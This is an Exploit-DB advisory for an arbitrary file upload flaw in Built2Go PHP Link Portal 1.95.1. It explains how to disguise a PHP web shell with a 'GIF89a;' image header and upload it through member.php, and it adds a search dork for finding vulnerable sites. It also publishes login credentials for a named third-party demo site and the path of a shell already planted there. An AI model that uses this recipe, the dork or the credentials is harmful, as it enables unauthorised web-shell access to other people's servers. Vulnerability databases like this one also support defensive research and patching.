Built2Go PHP Link Portal 1.95.1 - Arbitrary File Upload

EDB-ID:

7644

CVE:

N/A

EDB Verified:

Author:

ZoRLu

Type:

webapps

Exploit: /

Platform:

PHP

Date:

2009-01-02

Vulnerable App:

[~] Built2Go PHP Link Portal v1.95.1 RFU
[~]
[~]----------------------------------------------------------
[~] Discovered By: ZoRLu  msn: trt-turk@hotmail.com
[~]
[~] Date: 22.11.2008
[~]
[~] Home: z0rlu.blogspot.com / www.experl.com 
[~]
[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (
[~]
[~] dork mu :) "PHP Link Portal v1.95.1 Â© Big Resources, Inc." ( for yahoo )
[~]
[~] onemli N0TT: arkadaslar hepimiz biliyoruz ki arama motoru yalnIzca google deil 
[~]
[~] bide yahoo yu deneyin sonra hiÃ§ site yok dersiniz xD
[~]
[~] EN ONEMLi N0T: demolarI hackleyen top olsun top ( if you hack demo you will be ball xD )
[~] -----------------------------------------------------------

first register to site 

you add this code your shell to head 

GIF89a; 

example your_shell.php:

GIF89a;
<?

...

...

...

?>

and save your_sheell.php

after go member.php

select your shell.php and your shell here:

http://z0rlu.blogspot.com/script/pictures/[id]shell.php

exp:

demo:

http://www.q-seek.com/

login:

http://www.q-seek.com/member.php

user: salla

pass: salla1

shell:

http://www.q-seek.com/pictures/14_2009-01-02-02-25-03.php


[~]----------------------------------------------------------------------
[~] Greetz tO: str0ke & Scriptorium & h4ckinger & Cyber_Thief & BLaSTeR & Ahmet and all experl.com users :)
[~]
[~] yildirimordulari.org  &  experl.com
[~]
[~]----------------------------------------------------------------------

# milw0rm.com [2009-01-02]

Tags:

Advisory/Source: Link

Databases	Links	Sites	Solutions
Exploits	Search Exploit-DB	OffSec	Courses and Certifications
Google Hacking	Submit Entry	Kali Linux	Learn Subscriptions
Papers	SearchSploit Manual	VulnHub	OffSec Cyber Range
Shellcodes	Exploit Statistics		Proving Grounds
			Penetration Testing Services